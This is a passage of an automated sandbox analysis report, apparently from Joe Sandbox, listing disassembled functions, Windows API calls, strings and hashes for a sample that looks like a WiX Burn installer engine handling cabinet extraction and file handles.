Failed to initialize cabinet.dll., xrefs: 004E119F
Invalid operation for this state., xrefs: 004E137C
<the>.cab, xrefs: 004E11BD
Failed to wait for begin operation event., xrefs: 004E1311
Failed to initialize COM., xrefs: 004E1129
Failed to set operation complete event., xrefs: 004E12C4
cabextract.cpp, xrefs: 004E1193, 004E12BA, 004E1307, 004E1346, 004E1372
Failed to extract all files from container, erf: %d:%X:%d, xrefs: 004E1279
Failed to reset begin operation event., xrefs: 004E1350

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: InitializeUninitialize
String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3442037557-1168358783
Opcode ID: 128cb4010c60097abc71e1749eacd692c1f983b1f98b70a3db9947301d293092
Instruction ID: 7a30ed77559a289c10e1500b8aa5c9a42bc11e827a8d58bd8afdf42b7d03a831
Opcode Fuzzy Hash: 128cb4010c60097abc71e1749eacd692c1f983b1f98b70a3db9947301d293092
Instruction Fuzzy Hash: 17513A36DC11E2D7EB2157978C45EBF2954AB41722B2203ABBE11BB3A0D63D8C4091DE

Function 004C42D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,004C5266,?,?,00000000,?,?), ref: 004C4303
InitializeCriticalSection.KERNEL32(000000D0,?,?,004C5266,?,?,00000000,?,?), ref: 004C430C
lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,004C5266,?,?,00000000,?,?), ref: 004C4352
lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,004C5266,?,?,00000000,?,?), ref: 004C435C
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,004C5266,?,?,00000000,?,?), ref: 004C4370
lstrlenW.KERNEL32(burn.filehandle.attached,?,?,004C5266,?,?,00000000,?,?), ref: 004C4380
lstrlenW.KERNEL32(burn.filehandle.self,?,?,004C5266,?,?,00000000,?,?), ref: 004C43D0
lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,004C5266,?,?,00000000,?,?), ref: 004C43DA
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,004C5266,?,?,00000000,?,?), ref: 004C43EE
lstrlenW.KERNEL32(burn.filehandle.self,?,?,004C5266,?,?,00000000,?,?), ref: 004C43FE

Strings

burn.filehandle.attached, xrefs: 004C434D, 004C4355, 004C435A, 004C435B, 004C437B, 004C449F
burn.filehandle.self, xrefs: 004C43CB, 004C43D3, 004C43D8, 004C43D9, 004C43F9, 004C44CB
engine.cpp, xrefs: 004C4495, 004C44C1
Failed to initialize engine section., xrefs: 004C4467
Missing required parameter for switch: %ls, xrefs: 004C44A4
Failed to parse file handle: '%ls', xrefs: 004C4482

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: lstrlen$CompareCriticalInitializeSectionString
String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
API String ID: 3039292287-3209860532
Opcode ID: b53a049c340fe180a81ae0a1d92a33aec5695a32a631c227dc352fe45683ed7b
Instruction ID: dc32ab38db15a88f6236c0670e7df036e907270c8724951fb917847324b0dfa8
Opcode Fuzzy Hash: b53a049c340fe180a81ae0a1d92a33aec5695a32a631c227dc352fe45683ed7b
Instruction Fuzzy Hash: 9A51E4B5A40215BFD764EF68CD96F9E7B6CFF40720F10411AFA14E7290D7B4A900CAA8

Function 004CC28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,004CC47F,004C5405,?,?,004C5445), ref: 004CC2D6
GetLastError.KERNEL32(?,004CC47F,004C5405,?,?,004C5445,004C5445,00000000,?,00000000), ref: 004CC2E7
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,004CC47F,004C5405,?,?,004C5445,004C5445,00000000,?), ref: 004CC336
GetCurrentProcess.KERNEL32(000000FF,00000000,?,004CC47F,004C5405,?,?,004C5445,004C5445,00000000,?,00000000), ref: 004CC33C
DuplicateHandle.KERNELBASE(00000000,?,004CC47F,004C5405,?,?,004C5445,004C5445,00000000,?,00000000), ref: 004CC33F
GetLastError.KERNEL32(?,004CC47F,004C5405,?,?,004C5445,004C5445,00000000,?,00000000), ref: 004CC349
SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,004CC47F,004C5405,?,?,004C5445,004C5445,00000000,?,00000000), ref: 004CC39B
GetLastError.KERNEL32(?,004CC47F,004C5405,?,?,004C5445,004C5445,00000000,?,00000000), ref: 004CC3A5

Strings

Failed to open container., xrefs: 004CC3F1
Failed to open file: %ls, xrefs: 004CC318
Failed to duplicate handle to container: %ls, xrefs: 004CC37A
container.cpp, xrefs: 004CC30B, 004CC36D, 004CC3C9
crypt32.dll, xrefs: 004CC397
feclient.dll, xrefs: 004CC398
Failed to move file pointer to container offset., xrefs: 004CC3D3

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
API String ID: 2619879409-373955632
Opcode ID: 1ab01634c6ad90e71ab1e78daf68a1b3fb8369a0832081b57555e81a5919ac6b
Instruction ID: 08e54ced8d9ef1dc61798f74bfbf117c92663c7a444c80ecc68cd3f74e641cbf
Opcode Fuzzy Hash: 1ab01634c6ad90e71ab1e78daf68a1b3fb8369a0832081b57555e81a5919ac6b
Instruction Fuzzy Hash: 2E41C47A540242ABDB609E199C89F1F3AA5FFC5720F21802EFD189B391DB35C801DBA4

Function 00502AF7 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 79
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004C3838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004C3877
Part of subcall function 004C3838: GetLastError.KERNEL32 ref: 004C3881

Part of subcall function 00504A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00504A9D

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00502B41
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00502B61
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00502B81
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00502BA1
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00502BC1
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00502BE1
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00502C01

Strings

MsiSourceListAddSourceExW, xrefs: 00502BF6
MsiSetExternalUIRecord, xrefs: 00502BD6
MsiGetProductInfoExW, xrefs: 00502BB6
MsiEnumProductsExW, xrefs: 00502B76
MsiGetPatchInfoExW, xrefs: 00502B96
Msi.dll, xrefs: 00502B09
MsiDetermineApplicablePatchesW, xrefs: 00502B56
MsiDeterminePatchSequenceW, xrefs: 00502B36

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AddressProc$ErrorLast$DirectorySystem
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 2510051996-1735120554
Opcode ID: c694025210b38f923341c99b13c6bb0b7a89cd56bff516e9411edee85ce0c571
Instruction ID: 0d1ec8690d4af2fa60e77c34dd028ad1b87003edce82fec36f7ca200eb91b2d0
Opcode Fuzzy Hash: c694025210b38f923341c99b13c6bb0b7a89cd56bff516e9411edee85ce0c571
Instruction Fuzzy Hash: F631E4B0941618EBFB219F20ED4AB297FA5FF26304F14012AE404565B0E7B1384EFF54

Function 004E1741 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,004CC3EB,?,00000000,?,004CC47F), ref: 004E1778
GetLastError.KERNEL32(?,004CC3EB,?,00000000,?,004CC47F,004C5405,?,?,004C5445,004C5445,00000000,?,00000000), ref: 004E1781

Strings

Failed to create begin operation event., xrefs: 004E17AF
wininet.dll, xrefs: 004E1757
Failed to wait for operation complete., xrefs: 004E1854
cabextract.cpp, xrefs: 004E17A5, 004E17EB, 004E1837
Failed to create operation complete event., xrefs: 004E17F5
Failed to create extraction thread., xrefs: 004E1841
Failed to copy file name., xrefs: 004E1763

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
API String ID: 545576003-938279966
Opcode ID: c4540cbc8112c35320c1c81cab7257dc162ee20e4df98c508e178fabd1effb54
Instruction ID: faef55a4e6b6d399cfd5a917d81c1732376fcac9e04eb05aa78b7d143d483066
Opcode Fuzzy Hash: c4540cbc8112c35320c1c81cab7257dc162ee20e4df98c508e178fabd1effb54
Instruction Fuzzy Hash: 9A21F877DC167776E32226574C86F6B699CBF00BA1B024227FD01BB690E678DC4085E9

Function 004FFCAE Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 004FFCD6
GetProcAddress.KERNEL32(SystemFunction041), ref: 004FFCE8
GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 004FFD2B
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 004FFD3F
GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 004FFD77
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 004FFD8B

Strings

CryptProtectMemory, xrefs: 004FFD20
Crypt32.dll, xrefs: 004FFD0C
SystemFunction040, xrefs: 004FFCCB
cryputil.cpp, xrefs: 004FFD60
SystemFunction041, xrefs: 004FFCD8
AdvApi32.dll, xrefs: 004FFCB5
CryptUnprotectMemory, xrefs: 004FFD6C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AddressProc$ErrorLast
String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
API String ID: 4214558900-3191127217
Opcode ID: d4e71243efcac88b3907a149c41582171829b26ae3c7c58d3449a8d332196dc5
Instruction ID: 33c1558829f37635139e4136a14cdb500aaae7415b33fdcbb8e2268ca07a12ed
Opcode Fuzzy Hash: d4e71243efcac88b3907a149c41582171829b26ae3c7c58d3449a8d332196dc5
Instruction Fuzzy Hash: ED21CD36A4023A97E731AB117D057276E90BF62B51F050137EE01AF290F7799C0DAAD8

Function 004E08C2 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 004E08F2
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 004E090A
GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 004E090F
DuplicateHandle.KERNELBASE(00000000,?,?), ref: 004E0912
GetLastError.KERNEL32(?,?), ref: 004E091C
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 004E098B
GetLastError.KERNEL32(?,?), ref: 004E0998

Strings

Failed to add virtual file pointer for cab container., xrefs: 004E0971
Failed to duplicate handle to cab container., xrefs: 004E094A
<the>.cab, xrefs: 004E08EB
cabextract.cpp, xrefs: 004E0940, 004E09BC
Failed to open cabinet file: %hs, xrefs: 004E09C9

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: 7786eef953694139363df3f2aca970e52802f6e2636bde54259788c01076a1dd
Instruction ID: 2b1695b420f80ab09c917131d72245fbaf2b98e6e3790b06d438baff8c87544e
Opcode Fuzzy Hash: 7786eef953694139363df3f2aca970e52802f6e2636bde54259788c01076a1dd
Instruction Fuzzy Hash: 4D3133B6942136BBEB215E568C49F9F7E68FF04721F010112FD14B7242D3649C40C6E5

Function 004D6A57 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,004C4E11,?,?), ref: 004D6A77
GetCurrentProcess.KERNEL32(?,00000000,?,?,004C4E11,?,?), ref: 004D6A7D
DuplicateHandle.KERNELBASE(00000000,?,?,004C4E11,?,?), ref: 004D6A80
GetLastError.KERNEL32(?,?,004C4E11,?,?), ref: 004D6A8A
CloseHandle.KERNEL32(000000FF,?,004C4E11,?,?), ref: 004D6B03

Strings

burn.filehandle.attached, xrefs: 004D6AD0
core.cpp, xrefs: 004D6AAE
Failed to duplicate file handle for attached container., xrefs: 004D6AB8
Failed to append the file handle to the command line., xrefs: 004D6AEB
%ls -%ls=%u, xrefs: 004D6AD7

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CurrentHandleProcess$CloseDuplicateErrorLast
String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
API String ID: 4224961946-4196573879
Opcode ID: 649178b2008bd793b76601df2aa300b30637431c3962231ec21600932b45210b
Instruction ID: 4bd4649de16e98f91e4f3f1b5edea7297f1c0964d133d34a013a934c8efc3a80
Opcode Fuzzy Hash: 649178b2008bd793b76601df2aa300b30637431c3962231ec21600932b45210b
Instruction Fuzzy Hash: 0F118436A40226FBDB10ABA48D09E9E7B68AF05730F114257F920F73D0E7749D0196D5

Function 00500879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,004C53BD,00000000,?,?,?,?,?,?,?,004D769D,00000000), ref: 00500897
GetLastError.KERNEL32(?,?,?,?,?,?,?,004D769D,00000000), ref: 005008A1
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,004D769D,00000000), ref: 005008D3
GetLastError.KERNEL32(?,?,?,?,?,?,?,004D769D,00000000), ref: 005008EC
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,004D769D,00000000), ref: 0050092B

Strings

procutil.cpp, xrefs: 00500919

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastToken$CloseHandleInformationOpenProcess
String ID: procutil.cpp
API String ID: 4040495316-1178289305
Opcode ID: becd5acace4b28360d58f52898673859c53922649480f6300d9b1027b31995ca
Instruction ID: 40dc6b9f9936ce5e4b29801378b3ecdfc46dfdebfcd576c2fa345aef400662af
Opcode Fuzzy Hash: becd5acace4b28360d58f52898673859c53922649480f6300d9b1027b31995ca
Instruction Fuzzy Hash: F821A432E40229EBE7219F958849B9EBFA8FF10710F118166AD14AB2D0D3708E04EAD0

Function 004D6B13 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 004D6B49
CloseHandle.KERNEL32(00000000), ref: 004D6BB9

Strings

burn.filehandle.self, xrefs: 004D6B5A, 004D6B8C
Failed to append the file handle to the obfuscated command line., xrefs: 004D6BA7
Failed to append the file handle to the command line., xrefs: 004D6B75
%ls -%ls=%u, xrefs: 004D6B61, 004D6B93

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
API String ID: 3498533004-3263533295
Opcode ID: ce13dd8baed622d0395a80c2c4a5a0dff60bac8eb2f6870a92d89e72c087b836
Instruction ID: 602f950bb2864056bd32d8120bab29e60120eb56f974e0d37c901f79a45661e4
Opcode Fuzzy Hash: ce13dd8baed622d0395a80c2c4a5a0dff60bac8eb2f6870a92d89e72c087b836
Instruction Fuzzy Hash: 49110632600224BBEB205A68CC45F9F7BACEF45730F020357F924EB3E1E3B455118691

Function 00503565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00503574
InterlockedIncrement.KERNEL32(0052B6C8), ref: 00503591
CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,0052B6B8,?,?,?,?,?,?), ref: 005035AC
CLSIDFromProgID.OLE32(MSXML.DOMDocument,0052B6B8,?,?,?,?,?,?), ref: 005035B8

Strings

Msxml2.DOMDocument, xrefs: 005035A7
MSXML.DOMDocument, xrefs: 005035B3

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: c2acfadcecd306cd9b5c42598e4ed3abe051ca319aa05cb1ded60ecb1c54df70
Instruction ID: 59ca47402b086905f450d23145a9bd0cd143e70fc08883aa56dca5d3eacbed4e
Opcode Fuzzy Hash: c2acfadcecd306cd9b5c42598e4ed3abe051ca319aa05cb1ded60ecb1c54df70
Instruction Fuzzy Hash: 8EF065317411369BE7211B627D09B5F2F6DFF93B55F140429EC00D21F4D360E94596B1

Function 00504A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00504A9D
GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00504ACA
GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00504AF6
GetLastError.KERNEL32(00000000,0050B7A0,?,00000000,?,00000000,?,00000000), ref: 00504B34
GlobalFree.KERNEL32(00000000), ref: 00504B65

Strings

fileutil.cpp, xrefs: 00504AB8, 00504B11

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$Global$AllocFree
String ID: fileutil.cpp
API String ID: 1145190524-2967768451
Opcode ID: 6bebb4b5c2203357ccaef965479a51ead171c139dd23efe63a5c406394aaa335
Instruction ID: c976d6e158d379c6be705162586b693898df1f43e93f998f2c886dfaad2a368e
Opcode Fuzzy Hash: 6bebb4b5c2203357ccaef965479a51ead171c139dd23efe63a5c406394aaa335
Instruction Fuzzy Hash: C531E4B6E40229ABDB129A998C41FAFBEB8BF84750F114155FE04E7281D731DC009AE4

Function 004E0A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 004E0B27
GetLastError.KERNEL32(?,?,?), ref: 004E0B31

Strings

Failed to move file pointer 0x%x bytes., xrefs: 004E0B62
cabextract.cpp, xrefs: 004E0B55
Invalid seek type., xrefs: 004E0ABD

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: 4472582f80cce89e2b174aa0c18c800451b6f7aebd50d2499b8045aa5b4a419f
Instruction ID: d8de5094e707ee43ca29c21be0cbb59e4751b99f99c8a0d41fc0036fc2c8b661
Opcode Fuzzy Hash: 4472582f80cce89e2b174aa0c18c800451b6f7aebd50d2499b8045aa5b4a419f
Instruction Fuzzy Hash: 5531F431A4025AEFCB11CF99C884EAEBB69FF04325B048226FD24A7350D374ED508B95

Function 004C4115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,004DA0E8,00000000,00000000,?,00000000,004C53BD,00000000,?,?,004CD5B5,?), ref: 004C4123
GetLastError.KERNEL32(?,004DA0E8,00000000,00000000,?,00000000,004C53BD,00000000,?,?,004CD5B5,?,00000000,00000000), ref: 004C4131
CreateDirectoryW.KERNEL32(?,840F01E8,004C5489,?,004DA0E8,00000000,00000000,?,00000000,004C53BD,00000000,?,?,004CD5B5,?,00000000), ref: 004C419A
GetLastError.KERNEL32(?,004DA0E8,00000000,00000000,?,00000000,004C53BD,00000000,?,?,004CD5B5,?,00000000,00000000), ref: 004C41A4

Strings

dirutil.cpp, xrefs: 004C41D4

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CreateDirectoryErrorLast
